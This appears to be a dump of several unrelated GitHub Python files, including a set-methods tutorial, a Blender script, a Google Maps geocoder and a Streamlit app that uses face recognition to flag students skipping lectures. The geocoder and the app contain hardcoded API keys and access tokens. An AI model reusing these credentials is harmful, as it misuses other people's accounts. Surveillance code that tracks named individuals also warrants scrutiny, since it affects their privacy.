self.response_events\n\t\t\t\n\tdef trial_info (self, keys = ['answer']):\n\t\t\"\"\"\n\t\tfunction that returns list of arrays with trial information. Per trial all information in keys will be returned.\n\t\t\"\"\"\t\n\t\t\n\t\tself.trial_info = [[self.parameters[i][key] for key in keys] for i in range(len(self.parameters))]\n\t\t\n\t\treturn self.trial_info\n\t\t\n\t\t\n","repo_name":"dvanmoorselaar/PRF_decoding_analysis","sub_path":"WMMBehaviorOperator.py","file_name":"WMMBehaviorOperator.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"42728147570","text":"import bpy\r\n\r\n#def hide_show_objects(obj_name1, obj_name2):\r\n# obj1 = bpy.data.objects.get(obj_name1)\r\n# obj2 = bpy.data.objects.get(obj_name2)\r\n\r\n# if obj1 and obj2:\r\n# switch = obj1.hide_viewport\r\n# obj1.hide_viewport = obj2.hide_viewport\r\n# obj2.hide_viewport = switch\r\n\r\n#hide_show_objects('tsu_body', 'tsu.001')\r\n\r\ndef switch_visibility(hidden_obj, visible_obj):\r\n hidden_obj.hide_viewport = False\r\n hidden_obj.hide_render = False\r\n visible_obj.hide_viewport = True\r\n visible_obj.hide_render = True\r\n\r\ndef hide_show_objects(obj_name1, obj_name2):\r\n obj1 = bpy.data.objects.get(obj_name1)\r\n obj2 = bpy.data.objects.get(obj_name2)\r\n\r\n if obj1 and obj2:\r\n # Object 1 is hidden, Object 2 is visible\r\n if obj1.hide_viewport and not obj2.hide_viewport:\r\n switch_visibility(obj1, obj2)\r\n # Object 1 is visible, Object 2 is hidden\r\n elif not obj1.hide_viewport and obj2.hide_viewport:\r\n switch_visibility(obj2, obj1)\r\n # Both objects have the same hide state, toggle the visibility of Object 2\r\n else:\r\n obj2.hide_viewport = not obj2.hide_viewport\r\n\r\nhide_show_objects('tsu_body', 'tsu.001')","repo_name":"seilotte/Blender-Stuff","sub_path":"Scripts/mesh/mesh_hide-unhide objects.py","file_name":"mesh_hide-unhide objects.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"28725936305","text":"\"\"\"\r\nMethod\tDescription\r\n\r\nadd()\t\t\t\t\tAdds an element to the set\r\nclear()\t\t\t\t\tRemoves all the elements from the set\r\ncopy()\t\t\t\t\tReturns a copy of the set\r\ndifference()\t\t\tReturns a set containing the difference between two or more sets\r\ndifference_update()\t\tRemoves the items in this set that are also included in another, specified set\r\ndiscard()\t\t\t\tRemove the specified item\r\nintersection()\t\t\tReturns a set, that is the intersection of two other sets\r\nintersection_update()\tRemoves the items in this set that are not present in other, specified set(s)\r\nisdisjoint()\t\t\tReturns whether two sets have a intersection or not\r\nissubset()\t\t\t\tReturns whether another set contains this set or not\r\nissuperset()\t\t\tReturns whether this set contains another set or not\r\npop()\t\t\t\t\tRemoves an element from the set\r\nremove()\t\t\t\tRemoves the specified element\r\nsymmetric_difference()\tReturns a set with the symmetric differences of two sets\r\nsymmetric_difference_update()\tinserts the symmetric differences from this set and another\r\nunion()\t\t\t\t\tReturn a set containing the union of sets\r\nupdate()\t\t\t\tUpdate the set with the union of this set and others\r\n\"\"\"\r\n#thisset = set(\"apple\",\"pineapple\",\"mango\",\"blueberry\")#TypeError: set expected at most 1 argument, got 4\r\nthisset1 = set((\"apple\",\"pineapple\",\"mango\",\"blueberry\"))\r\nprint(type(thisset1))#\r\nprint(thisset1)#{'pineapple', 'apple', 'blueberry', 'mango'}\r\n#============Add=============\r\nthisset1.add(\"grapes\")\r\nprint(thisset1)#{'grapes', 'mango', 'blueberry', 'apple', 'pineapple'}\r\n#============Clear===========\r\nthisset2 = set((\"apple\",\"pineapple\",\"mango\",\"blueberry\"))\r\nprint(thisset2)\r\nthisset2.clear()\r\nprint(thisset2)\r\n#============Copy===========================\r\nthisset3 = set((\"apple\",\"pineapple\",\"mango\",\"blueberry\"))\r\nprint(thisset3)\r\n#thisset4 = thisset3.Copy()#AttributeError: 'set' object has no attribute 'Copy'(case sensitive)\r\nthisset4 = thisset3.copy()\r\nprint(thisset3)#{'mango', 'pineapple', 'apple', 'blueberry'}\r\nprint(thisset4)#{'mango', 'pineapple', 'apple', 'blueberry'}\r\n#============difference============\r\nx = {\"apple\", \"banana\", \"cherry\"}\r\ny = {\"google\", \"microsoft\", \"apple\"}\r\nz1 = x.difference(y)#{'banana', 'cherry'}\r\nz2 = y.difference(x)#{'google', 'microsoft'}\r\nprint(x.difference(y))#{'banana', 'cherry'}\r\nprint(y.difference(x))#{'google', 'microsoft'}\r\n#============difference_update=====\r\nx1 = {\"apple\", \"banana\", \"cherry\"}\r\ny1 = {\"google\", \"microsoft\", \"apple\"}\r\nprint(x1)#{'cherry', 'apple', 'banana'}\r\nx1.difference_update(y1)\r\nprint(x1)#{'cherry', 'banana'}\r\nx2 = {\"apple\", \"banana\", \"cherry\"}\r\ny2 = {\"google\", \"microsoft\", \"apple\"}\r\ny2.difference_update(x2)\r\nprint(y2)#{'microsoft', 'google'}\r\n#============discard=================\r\nfruits = {\"apple\", \"banana\", \"cherry\"}\r\nprint(fruits)#{'cherry', 'banana', 'apple'}\r\nfruits.discard(\"banana\")\r\nprint(fruits)#{'cherry', 'apple'}\r\n#============intersection============\r\nx = {\"apple\", \"banana\", \"cherry\"}\r\ny = {\"google\", \"microsoft\", \"apple\"}\r\nz = x.intersection(y)#Comman to both sets\r\nprint(z)#{'apple'}\r\nx2 = {\"a\", \"b\", \"c\"}\r\ny2 = {\"c\", \"d\", \"e\"}\r\nz2 = {\"f\", \"g\", \"c\"}\r\nresult = x2.intersection(y2, z2)\r\nprint(result)#{'c'}\r\n#=======intersection_update===========\r\nx3 = {\"a\", \"b\", \"c\"}\r\ny3 = {\"c\", \"d\", \"e\"}\r\nz3 = {\"f\", \"g\", \"c\"}\r\n\r\nx3.intersection_update(y3, z3)\r\nprint(x3)#{'c'}\r\nx4 = {\"apple1\", \"banana\", \"cherry\"}\r\ny4 = {\"google\", \"microsoft\", \"apple\"}\r\nx4.intersection_update(y4)\r\nprint('x4: '+str(x4))#x4: set()\r\nx4A = {\"apple\", \"banana\", \"cherry\"}\r\ny4A = {\"google\", \"microsoft\", \"apple\"}\r\nx4A.intersection_update(y4A)\r\nprint('x4A: '+str(x4A))#x4A: {'apple'}\r\n#=========isdisjoint==================\r\nx5 = {\"apple\", \"banana\", \"cherry\"}\r\ny5 = {\"google\", \"microsoft\", \"facebook\"}\r\nz5 = x5.isdisjoint(y5)\r\nprint(z5)#True\r\n#=========issubset====================\r\nx6 = {\"a\", \"b\", \"c\"}\r\ny6 = {\"f\", \"e\", \"d\", \"c\", \"b\", \"a\"}\r\nz6 = x6.issubset(y6)\r\nz7 = y6.issubset(x6)\r\nz8 = y6.issuperset(x6)\r\nprint('z6: '+str(z6))#z6: True\r\nprint('z7: '+str(z7))#z7: False\r\nprint('z8: '+str(z8))#z8: True\r\n#========issuperset=============\r\nx8 = {\"f\", \"e\", \"d\", \"c\", \"b\", \"a\"}\r\ny8 = {\"a\", \"b\", \"c\"}\r\nz8 = x8.issuperset(y8)\r\nprint(z8)\r\n#=============pop===================\r\n#Remove a random item from the set:\r\nx9 = {\"apple\", \"banana\", \"cherry\"}\r\nx9.pop()\r\nprint('x9: '+str(x9))#x9: {'cherry', 'banana'}' This keeps changing for each run (random)'\r\n#========remove==============\r\n#Remove \"banana\" from the set:\r\nx10 = {\"apple\", \"banana\", \"cherry\"}\r\nx10.remove(\"banana\")\r\nprint('x10: '+str(x10))#x10: {'cherry', 'apple'}' Order of appearance changes for every run'\r\n#======symmetric_difference=====\r\n#Return a set that contains all items from both sets, except items that are present in both sets:\r\nx11 = {\"apple\", \"banana\", \"cherry\"}\r\ny11 = {\"google\", \"microsoft\", \"apple\"}\r\nz11 = x11.symmetric_difference(y11)\r\nprint('z11 :'+str(z11))#z11 :{'banana', 'microsoft', 'cherry', 'google'}\r\n#======symmetric_difference_update=====\r\n#Remove the items that are present in both sets, AND insert the items that is not present in both sets:\r\nx12 = {\"apple\", \"banana\", \"cherry\"}\r\ny12 = {\"google\", \"microsoft\", \"apple\"}\r\nx12.symmetric_difference_update(y12)\r\nprint('x12: '+str(x12))#x12: {'banana', 'google', 'cherry', 'microsoft'}\r\n#===========Union================\r\n#Return a set that contains all items from both sets, duplicates are excluded:\r\nx13 = {\"apple\", \"banana\", \"cherry\"}\r\ny13 = {\"google\", \"microsoft\", \"apple\"}\r\nz13 = x.union(y)\r\nprint('z13: '+str(z13))\r\n#=========Unify=========\r\n#Unify more than 2 sets:\r\nx14 = {\"a\", \"b\", \"c\"}\r\ny14 = {\"f\", \"d\", \"a\"}\r\nz14 = {\"c\", \"d\", \"e\"}\r\nresult = x14.union(y14, z14)\r\nprint(result)#{'d', 'a', 'f', 'e', 'c', 'b'}\r\n#=====update==========\r\n#Insert the items from set y into set x:\r\nx15 = {\"apple\", \"banana\", \"cherry\"}\r\ny15 = {\"google\", \"microsoft\", \"apple\"}\r\nx15.update(y15)\r\nprint('x15: '+str(x15))#x15: {'google', 'cherry', 'apple', 'banana', 'microsoft'}\r\n#================================","repo_name":"Konarsrini/PythonB","sub_path":"V_NewPrograms/V_Set_Methods.py","file_name":"V_Set_Methods.py","file_ext":"py","file_size_in_byte":5952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13120988066","text":"# 编程实现如下要求。\n# 1)创建员工类 Employee,属性有姓名 name、能力值 ability、年龄 age(能力值为\n# 100-年龄),功能有 doWork(),该方法执行一次,该员工的能力值-10。\n# 2)创建老板类 Boss,属性有金钱 money,员工列表 employeeList(存储员工类对象),\n# 工作量 work,功能有雇佣员工 addEmployee(),雇佣后将员工添加至列表中,雇佣一人\n# money 减 5000,金额不足时不能雇佣新员工;开始工作 startWork(),工作开始后,依次\n# 取出员工列表中的员工开始工作,员工能力值减少的同时总的工作量 work 也减少,当\n# 工作量 work 为 0 时,工作结束,如果所有员工使用完后,依然没有完成工作,则提示\n# 老板需要雇佣新员工,并打印剩余工作量\n# 3)创建 Boss 类对象,默认执行雇佣 3 个员工,年龄分别为 30,40,50,然后死循环\n# 开始工作,直至工作完成。\nclass Employee(object):\n def __init__(self, name, age):\n self.name = name\n self.age = age\n self.ability = 100 - self.age\n\n def doWork(self):\n self.ability -= 10\n def __str__(self):\n return self.name\n\n\nclass Boss(object):\n def __init__(self,money,work):\n self.money=money\n self.work=work\n self.employeeList=[]\n def addEmployee(self,employee):\n if self.money<5000:\n print('余额不足,无法雇佣',employee.name)\n else:\n\n self.employeeList.append(employee)\n print(employee.name,'雇佣成功')\n self.money-=5000\n def startWork(self):\n for i in self.employeeList:\n if self.work==0:\n print('工作完成')\n break\n else:\n print(i, '开始工作')\n i.doWork()\n self.work-=10\n if self.work==0:\n print('工作完成')\n break\n if self.work>0:\n print('需要雇佣新员工,剩余工作量为',self.work)\nwj=Boss(money=14000,work=100)\na=Employee('小李',30)\nb=Employee('小张',40)\nc=Employee('小徐',50)\nwj.addEmployee(a)\nwj.addEmployee(b)\nwj.addEmployee(c)\nwhile wj.work!=0:\n wj.startWork()\n\n","repo_name":"wang1602293772/python_code","sub_path":"Python100道练习题/MOOC练习题/第九章/test10.py","file_name":"test10.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30291898286","text":"from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom . import views\n\nurlpatterns=[\n\tpath('',views.index, name='index'),\n\tpath('index/',views.index, name='index'),\n\tpath('girls/',views.home, name='girls'),\n\tpath('boys/ranking2/',views.ranking2, name='ranking2'),\n\tpath('ranking2/',views.ranking2, name='ranking2'),\n\tpath('boys',views.boys, name='boys'),\n\tpath('girls/ranking/',views.rankings,name='ranking'),\n\tpath('ranking/',views.rankings,name='ranking'),\n]+static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\n\n","repo_name":"utkarsh-dubey/facemashv2","sub_path":"app1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14075394679","text":"import streamlit as st\nimport time\nfrom PIL import Image\n\nfrom streamlit_option_menu import option_menu\nimport pandas as pd\n# Import the following modules\nfrom pushbullet import PushBullet\nfrom pywebio.input import *\nfrom pywebio.output import *\nfrom pywebio.session import *\nimport time\nimport cv2\nimport face_recognition\n# archimage = Image.open('/mount/src/smartcampus/Architechture_Face_Recog.jpg')\n# smartcampusimage = Image.open('/mount/src/smartcampus/SmartCampus.jpg')\n\nwith st.sidebar:\n \n selected = option_menu('Smart Campus Surveillance Module',\n \n ['About Project',\n 'Project Contributors',\n 'Architecture Diagram',\n 'Face Recognition'\n ],\n icons=['activity','activity','activity','activity'],\n default_index=0)\n\nif (selected == 'About Project'):\n # page title\n st.title('Smart Campus Surveillance & Guidance System')\n st.markdown('Aim of the project is to build a machine learning based Smart Campus Surveillance model which checks whether students are attending \\\n the lectures or bunking the lectures based on the camera feed received from the camera installed in the campus. It will send a alert notification to respective HOD or Class Teacher about the bunks done by student')\n #st.image(smartcampusimage, caption='')\n \n\nif (selected == 'Project Contributors'):\n st.title(\"1. Sanjana Marode\")\n st.title(\"2. Hritika Belekar\")\n st.title(\"3. Pallavi Kurve\")\n\nif (selected == 'Architecture Diagram'):\n #st.image(archimage, caption='Architecture Diagram for Face Recognition Module')\n # st.markdown(\"Architecture Diagram of the Entire Project\")\n pass\n\n\n\nimport pandas as pd\nfrom datetime import datetime, time\nfrom pushbullet import PushBullet\n\ndef check_db_trigger():\n path_ = '/mount/src/smartcampus/Attendance.csv'\n\n data_set = pd.read_csv(path_)\n\n for index, row in data_set.iterrows():\n # Define the start and end timestamps for each row\n start_time = time(row['Start_Time'], 0)\n end_time = time(row['End_Time'], 0)\n\n # Create a datetime object for the current time\n current_time = time(datetime.now().hour, datetime.now().minute)\n\n # print('Current Time:', current_time)\n\n # Check if the current_time lies between start_time and end_time\n if start_time <= current_time <= end_time:\n access_token = 'o.LK4aelu6Qp5j7GN97Czoh0XCfOOdEu6P'\n data = 'Bunk'\n pb = PushBullet(access_token)\n push = pb.push_note(data, row['Student'] + ' is bunking the ' + row['Lecture'] + ' Lecture')\n # print('API Triggered')\n break # This will exit the loop once the API is triggered\n\n print('Loop finished without triggering the API')\n\ndef identify_face():\n student_name='Hrtika Belekar'\n\n # Open the input movie file\n\n ##HRITIKA\n input_movie = cv2.VideoCapture(\"/mount/src/smartcampus/VID20231107160512_short2.mp4\")\n length = int(input_movie.get(cv2.CAP_PROP_FRAME_COUNT))\n\n # Create an output movie file (make sure resolution/frame rate matches input video!)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n output_movie = cv2.VideoWriter(student_name+'_output.avi', fourcc, 29.97, (640, 360))\n\n ## HRITIKA\n student_image = face_recognition.load_image_file(\"/mount/src/smartcampus/IMG20231106170435.jpg\")\n\n student_face_encoding = face_recognition.face_encodings(student_image)[0]\n\n known_faces = [\n student_face_encoding\n ]\n\n # Initialize some variables\n face_locations = []\n face_encodings = []\n face_names = []\n frame_number = 0\n # student_name=''\n while True:\n # Grab a single frame of video\n ret, frame = input_movie.read()\n frame_number += 1\n\n if not ret:\n break\n\n rgb_small_frame = np.ascontiguousarray(frame[:, :, ::-1])\n face_locations = face_recognition.face_locations(rgb_small_frame)\n print('face_locations',face_locations)\n face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n\n face_names = []\n for face_encoding in face_encodings:\n match = face_recognition.compare_faces(known_faces, face_encoding, tolerance=0.50)\n # print('match',match)\n\n name = None\n \n if match[0]:\n name = student_name\n face_names.append(name)\n check_db_trigger()\n # print('status',status)\n # if status==200:\n # break\n # else:\n # continue\n\n # Label the results\n try:\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n\n if not name:\n continue\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n # Draw a label with a name below the face\n cv2.rectangle(frame, (left, bottom - 25), (right, bottom), (0, 0, 255), cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, name, (left + 6, bottom - 6), font, 0.5, (255, 255, 255), 1)\n # print('*')\n cv2.imwrite(student_name+'_1.jpg', frame)\n except Exceptipn as e:\n print(e)\n # Write the resulting image to the output video file\n print(\"Writing frame {} / {}\".format(frame_number, length))\n output_movie.write(frame)\n\n # Display the resulting image\n # cv2.imshow('Video', frame)\n # cv2.waitKey(0) \n # All done!\n input_movie.release()\n cv2.destroyAllWindows()\n # page title\n# Heart Disease Prediction Page\nif (selected == 'Face Recognition'):\n\n# Set a title for your app\n st.title('Smart Campus Surveillance & Guidance System')\n\n st.title(\"Upload Video File\")\n\n # Create a file uploader widget\n uploaded_file = st.file_uploader(\"Upload a file\", type=[\"txt\", \"csv\", \"pdf\", \"jpg\", \"png\",\"mp4\",\"avi\"])\n\n if st.button(\"Run Face Recognition Module\"):\n # Display a spinner while some processing is happening\n # with st.spinner(\"Model Processing...\"):\n # Simulate some time-consuming task (e.g., sleep for a few seconds)\n # time.sleep(3)\n identify_face()\n# Remove the spinner after the task is done\n\n\n\n# Call the function\n# check_db_trigger()\n\n\n","repo_name":"project10109/SmartCampus__","sub_path":"app_fr.py","file_name":"app_fr.py","file_ext":"py","file_size_in_byte":6569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74127565044","text":"import csv\r\nimport requests\r\n\r\n# requires fields named Address, City, State\r\n# uses optional field called Zip Code\r\n# if latitude and longitude are in ungeocoded file make sure they are called 'Latitude' and 'Longitude'\r\naddress_csv_in = r\"C:\\Users\\tjohnson\\Desktop\\Demos\\mason_demo_sites.csv\"\r\niter_num = 0\r\n\r\naddress_csv_in = r\"Z:\\(G) Geographic Information Systems\\GIS SUPPORT\\185 - Savalot\\DATA\\Heat Map Sites\\sal_sites_12_5_17.csv\"\r\n\r\ncsvfile_out = address_csv_in.split('.csv')[0] + '_geocoded.csv'\r\n\r\ngmap_url = \"https://maps.googleapis.com/maps/api/geocode/json?\"\r\napi_key = \"AIzaSyDpa9FUmUBcVQwg37VRDoOs3W3JVUjaD00\"\r\n\r\naddress_list = []\r\ngeocoded_address_list = []\r\nextra_components_list = []\r\n\r\nzip_present = False\r\nsc_present = False\r\n \r\n\r\ndef read_addresses(ungeocoded_addresses_file):\r\n global address_list\r\n global extra_components_list\r\n global zip_present\r\n global sc_present\r\n with open(ungeocoded_addresses_file, 'r') as csv_in:\r\n reader = csv.DictReader(csv_in)\r\n \r\n if 'Zip Code' in reader.fieldnames:\r\n zip_present = True\r\n if 'Shopping Center' in reader.fieldnames:\r\n sc_present = True\r\n if 'Site' in reader.fieldnames:\r\n site = True\r\n \r\n \r\n for row in reader:\r\n if site is True:\r\n address_list.append(row['Site'].split(','))\r\n else:\r\n if zip_present and sc_present:\r\n address_components_list = [row['Shopping Center'].strip(), row['Address'].strip(), row['City'].strip(), row['State'].strip(), row['Zip Code'].strip()]\r\n elif zip_present:\r\n address_components_list = [row['Address'].strip(), row['City'].strip(), row['State'].strip(), row['Zip Code'].strip()]\r\n elif sc_present:\r\n address_components_list = [row['Shopping Center'].strip(), row['Address'].strip(), row['City'].strip(), row['State'].strip()]\r\n \r\n address_list.append(address_components_list)\r\n\r\n \r\ndef google_maps_geocode(address):\r\n address2 = \", \".join(address)\r\n address3 = address2.replace(\" \", \"%20\")\r\n print(address3)\r\n #print(address3)\r\n r = requests.get(gmap_url + \"address=\" + address3 + \"&key=\" + api_key)\r\n print(gmap_url + \"address=\" + address3 + \"&key=\" + api_key)\r\n rj = r.json()\r\n #print(rj)\r\n street_address = city = state = zip_code = \"\"\r\n \r\n for item in rj['results'][0]['address_components']:\r\n if item['types'][0] == 'street_number':\r\n index = rj['results'][0]['address_components'].index(item)\r\n street_address = item['long_name'] + ' ' + rj['results'][0]['address_components'][index + 1]['long_name']\r\n if item['types'][0] == 'locality':\r\n city = item['long_name']\r\n if item['types'][0] == 'administrative_area_level_1':\r\n state = item['short_name']\r\n if item['types'][0] == 'postal_code':\r\n zip_code = item['long_name']\r\n full_address = rj['results'][0]['formatted_address']\r\n full = full_address.rsplit(',', 1)[0]\r\n lat = rj['results'][0]['geometry']['location']['lat']\r\n lng = rj['results'][0]['geometry']['location']['lng']\r\n accuracy = rj['results'][0]['geometry']['location_type']\r\n \r\n if zip_present and sc_present:\r\n addresses_component_list = address + [address[0] + ', ' + full, lat, lng, accuracy]\r\n elif zip_present:\r\n addresses_component_list = address + [full, lat, lng, accuracy] \r\n elif sc_present:\r\n addresses_component_list = address + [zip_code, address[0] + ', ' + full, lat, lng, accuracy]\r\n else:\r\n addresses_component_list = address + [zip_code, full, lat, lng, accuracy] \r\n \r\n geocoded_address_list.append([addresses_component_list])\r\n \r\n try:\r\n print(rj['results'][0]['address_components'][0]['long_name'] + ' ' + rj['results'][0]['address_components'][1]['long_name'])\r\n print(rj['results'][0]['address_components'][2]['long_name'])\r\n print(rj['results'][0]['address_components'][4]['short_name'])\r\n print(rj['results'][0]['address_components'][6]['long_name'])\r\n print(rj['results'][0]['formatted_address'])\r\n print(rj['results'][0]['geometry']['location']['lat'])\r\n print(rj['results'][0]['geometry']['location']['lng'])\r\n print(rj['results'][0]['geometry']['location_type'])\r\n print()\r\n except:\r\n pass\r\n \r\n \r\ndef write_to_file(geocoded_addresses):\r\n global sc_present\r\n global zip_present\r\n with open(csvfile_out, 'w', newline='') as outcsv: \r\n writer = csv.writer(outcsv, delimiter=',')\r\n if sc_present:\r\n writer.writerow(['Shopping Center','Address', 'City', 'State', 'Zip Code', 'Full Address', 'Latitude', 'Longitude', 'Accuracy'])\r\n elif zip_present:\r\n writer.writerow(['Address', 'City', 'State', 'Zip Code', 'Full Address', 'Latitude', 'Longitude', 'Accuracy'])\r\n \r\n for item in geocoded_addresses:\r\n writer.writerows(item)\r\n \r\n \r\ndef run(number=0):\r\n global address_list\r\n if number == 0:\r\n read_addresses(address_csv_in)\r\n for item in address_list:\r\n google_maps_geocode(item)\r\n write_to_file(geocoded_address_list)\r\n else:\r\n read_addresses(address_csv_in)\r\n for item in address_list[:number]:\r\n google_maps_geocode(item)\r\n write_to_file(geocoded_address_list)\r\n \r\n \r\nif __name__ == '__main__':\r\n run(iter_num)\r\n","repo_name":"tayloraj10/python_geocoder","sub_path":"geocoder.py","file_name":"geocoder.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33567328290","text":"import problem\nimport math\n\nclass Problem(problem.Problem):\n\tdef __init__(self):\n\t\tnumber = 16\n\t\tquestion = 'What is the sum of the digits of the number 2^1000?'\n\t\tproblem.Problem.__init__(self, number, question)\n\n\tdef getAnswer(self):\n\n\t\tnumbers = [0 for i in xrange(int(math.log(2) * 1000.0 / math.log(10)) + 1)]\n\t\tnumbers[0] = 1\n\t\tdigit = 1\n\n\t\tfor i in xrange(1000):\n\t\t\tfor j in xrange(digit+1):\n\t\t\t\tnumbers[j] *= 2\n\t\t\tfor j in xrange(digit+1):\n\t\t\t\tif numbers[j] >= 10:\n\t\t\t\t\tnumbers[j+1] += numbers[j] / 10\n\t\t\t\t\tnumbers[j] = numbers[j] % 10\n\t\t\t\t\tif j == digit:\n\t\t\t\t\t\tdigit += 1\n\n\t\tret = 0\n\t\tfor i in xrange(digit+1):\n\t\t\tret += numbers[i]\n\t\treturn ret\t\t\t\n","repo_name":"seongjaelee/ProjectEuler","sub_path":"problem016.py","file_name":"problem016.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"34088139330","text":"import os\nimport json\nimport copy\nimport extra_classes.make_settings as make_settings\n\n\ndef get_config(config_path):\n if os.path.isfile(config_path):\n if os.stat(config_path).st_size > 0:\n json_config = json.load(open(config_path))\n else:\n json_config = {}\n else:\n json_config = {}\n file_name = os.path.basename(config_path)\n json_config2 = json.loads(json.dumps(make_settings.config(\n **json_config), default=lambda o: o.__dict__))\n if json_config != json_config2:\n update_config(json_config2, file_name=file_name)\n if not json_config:\n input(\"The .settings\\\\config.json file has been created. Fill in whatever you need to fill in and then press enter when done.\\n\")\n json_config2 = json.load(open(config_path))\n\n json_config = copy.deepcopy(json_config2)\n return json_config, json_config2\n\n\ndef update_config(json_config, file_name=\"config.json\"):\n directory = '.settings'\n os.makedirs(directory, exist_ok=True)\n path = os.path.join(directory, file_name)\n with open(path, 'w', encoding='utf-8') as f:\n json.dump(json_config, f, ensure_ascii=False, indent=2)\n","repo_name":"myanongithubplace/OnlyFans","sub_path":"extras/OFRenamer/extra_helpersa/main_helper.py","file_name":"main_helper.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"22389988241","text":"from easydict import EasyDict as edict\nimport os \nimport numpy as np\n\ncfg = edict()\n\n## trainer\ntrainer = edict(\n gpu = 0,\n max_epochs = 8,\n disp_iter = 250,\n save_iter = 8,\n test_iter = 2,\n training_func = \"train_mono_depth\",\n evaluate_func = \"evaluate_kitti_depth\",\n)\n\ncfg.trainer = trainer\n\n## path\npath = edict()\npath.raw_path = \"/disk0/data/kitti_raw\"\npath.depth_path = \"/disk0/data/kitti_depth/train\"\npath.validation_path = \"/disk0/data/kitti_depth/depth_selection/val_selection_cropped\"\npath.test_path = \"/disk0/data/kitti_depth/depth_selection/test_depth_prediction_anonymous\"\n\npath.visualDet3D_path = \"./visualDet3D\" # The path should point to the inner subfolder\npath.project_path = \"./workdirs\" # or other path for pickle files, checkpoints, tensorboard logging and output files.\n\nif not os.path.isdir(path.project_path):\n os.mkdir(path.project_path)\npath.project_path = os.path.join(path.project_path, 'MonoDepth')\nif not os.path.isdir(path.project_path):\n os.mkdir(path.project_path)\n\npath.log_path = os.path.join(path.project_path, \"log\")\nif not os.path.isdir(path.log_path):\n os.mkdir(path.log_path)\n\npath.checkpoint_path = os.path.join(path.project_path, \"checkpoint\")\nif not os.path.isdir(path.checkpoint_path):\n os.mkdir(path.checkpoint_path)\n\npath.preprocessed_path = os.path.join(path.project_path, \"output\")\nif not os.path.isdir(path.preprocessed_path):\n os.mkdir(path.preprocessed_path)\n\npath.train_imdb_path = os.path.join(path.preprocessed_path, \"training\")\nif not os.path.isdir(path.train_imdb_path):\n os.mkdir(path.train_imdb_path)\n\npath.val_imdb_path = os.path.join(path.preprocessed_path, \"validation\")\nif not os.path.isdir(path.val_imdb_path):\n os.mkdir(path.val_imdb_path)\n\ncfg.path = path\n\n## optimizer\noptimizer = edict(\n type_name = 'adam',\n keywords = edict(\n lr = 1e-4,\n weight_decay = 0,\n ),\n clipped_gradient_norm = 1.0\n)\ncfg.optimizer = optimizer\n## scheduler\nscheduler = edict(\n type_name = 'CosineAnnealingLR',\n keywords = edict(\n T_max = cfg.trainer.max_epochs,\n eta_min = 1e-5,\n ),\n is_iter_based = False\n)\ncfg.scheduler = scheduler\n\n## data\ndata = edict(\n batch_size = 8,\n num_workers = 8,\n rgb_shape = (352, 1216, 3),\n train_dataset = \"KittiDepthMonoDataset\",\n val_dataset = \"KittiDepthMonoValTestDataset\",\n test_dataset = \"KittiDepthMonoValTestDataset\",\n)\n\ndata.augmentation = edict(\n mirrorProb = 0.5,\n rgb_mean = np.array([0.485, 0.456, 0.406]),\n rgb_std = np.array([0.229, 0.224, 0.225]),\n cropSize = (data.rgb_shape[0], data.rgb_shape[1]),\n)\ndata.train_augmentation = [\n edict(type_name='ConvertToFloat'),\n edict(type_name='CropTop', keywords=edict(output_height=data.rgb_shape[0])),\n edict(type_name='RandomCropToWidth', keywords=dict(width=data.rgb_shape[1])),\n edict(type_name='RandomMirror', keywords=edict(mirror_prob=0.5)),\n edict(type_name='Normalize', keywords=edict(mean=data.augmentation.rgb_mean, stds=data.augmentation.rgb_std))\n]\ndata.test_augmentation = [\n edict(type_name='ConvertToFloat'),\n edict(type_name='CropTop', keywords=edict(output_height=data.rgb_shape[0])),\n edict(type_name='CropRight', keywords=edict(output_width=data.rgb_shape[1])),\n edict(type_name='Normalize', keywords=edict(mean=data.augmentation.rgb_mean, stds=data.augmentation.rgb_std))\n]\ncfg.data = data\n\n## networks\ndetector = edict()\ndetector.name = 'MonoDepth'\ndetector.backbone = edict(\n depth=34,\n pretrained=True,\n frozen_stages=-1,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n norm_eval=False,\n dilations=(1, 1, 1, 1),\n strides=(1, 2, 2, 2),\n)\ndetector.preprocessed_path = path.preprocessed_path\ndetector.max_depth=100\ndetector.output_channel=1\ndetector.SI_loss_lambda=0.8\ndetector.smooth_loss_weight = 0.0\ndetector.minor_weight=1.0\ncfg.detector = detector\n","repo_name":"cnexah/DeepLineEncoding","sub_path":"depth_prediction/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"76"} +{"seq_id":"27413418117","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Gender Recognition by Voice Kaggle [ Test Accuracy : 99.08 % ]\n\n# In[ ]:\n\n\n\n\n\n# ## CONTENTS::\n\n# [ **1 ) Importing Various Modules and Loading the Dataset**](#content1)\n\n# [ **2 ) Exploratory Data Analysis (EDA)**](#content2)\n\n# [ **3 ) OutlierTreatment**](#content3)\n\n# [ **4 ) Feature 